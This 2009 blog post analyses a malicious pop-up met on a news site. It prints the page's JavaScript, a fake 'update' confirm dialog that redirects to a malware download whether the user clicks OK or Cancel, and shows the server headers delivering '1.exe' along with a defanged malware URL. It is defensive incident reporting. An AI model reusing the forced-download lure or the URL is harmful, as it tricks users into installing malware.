Friday, March 13, 2009

Malware attack avoided

And now something appropriate for Friday the 13th!

Last weekend I was checking the news on a few sites using fully patched IE6 on XP when I went to my local major news site. Before the page finished loading, I saw this message in a standard popup dialog box with OK and Cancel:

"For the further viewing of page it's needed to set an update.
To update it immediately press OK."


Immediate strongly suspicious (the POOR English was also a clue), I looked on the lower left bar of IE and saw "84654321(dot)cn/vparivatel.php" (I replaced the period with dot so you won't accidentally click on it -- DO NOT go to that URL -- it's still alive). The CN extension was enough for me to know that something no good was happening. I quickly wrote it down and used Task Manager to kill iexplore.exe. Then I restarted and cleaned out IE's cache.

Killing IE is the best way to deal with things like this because as you will discover below, hitting Cancel was just as bad as hitting OK on that dialog box.

Next, I fired up NetScanTools Pro and went to URL Capture. This tool brings in the text from a website and does not run scripts or download images. It simply downloads the raw text and displays it. So I entered the URL and retrieved it. Inside the script tags was this:

function last(){
if (confirm('\nFor the further viewing of page it\'s needed to set an update.\nTo update it immediately press OK.'))
{
parent.location='?a';
}
else{
parent.location='?a';
}
}
last();


You can see that whether you press OK or Cancel or red X, it appends ?a to the URL and activates it. So next I used URL Capture to do just that, manually of course. And guess what, MALWARE. Here is the start of what comes back:

Server: Apache/2
X-Powered-By: PHP/5.2.8
Accept-Ranges: bytes
Content-Length: 43241
Content-Disposition: inline; filename=1.exe
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/octet-stream
MZ followed by lots of barely printable characters, then part of a regular webpage.


MZ are the first two characters of an executable Windows file, and IE was being told that it was an application. So if I had not killed IE, it would have infected my computer with this executable. Needless to say I contacted the news site webmaster, but they didn't reply. I suspect it came through an ad that was rotated through.

Don't go to that URL because if you do, you will get this MALWARE executable -- it is still alive today.

Searches on 1.exe and vparivatel reveal that it does something similar to that other MALWARE I reported on where there is a forced redirect (hijack) to a bogus AV or security product.

The moral of all this is that you can get these things even from what you think are trusted sites. If those sites are running ads from other 3rd parties, you cannot totally trust the site. And the second thing is to kill your browser with Task Manager rather than trying to shut it down normally -- oh and don't forget to clean the browser's cache -- immediately.

No comments: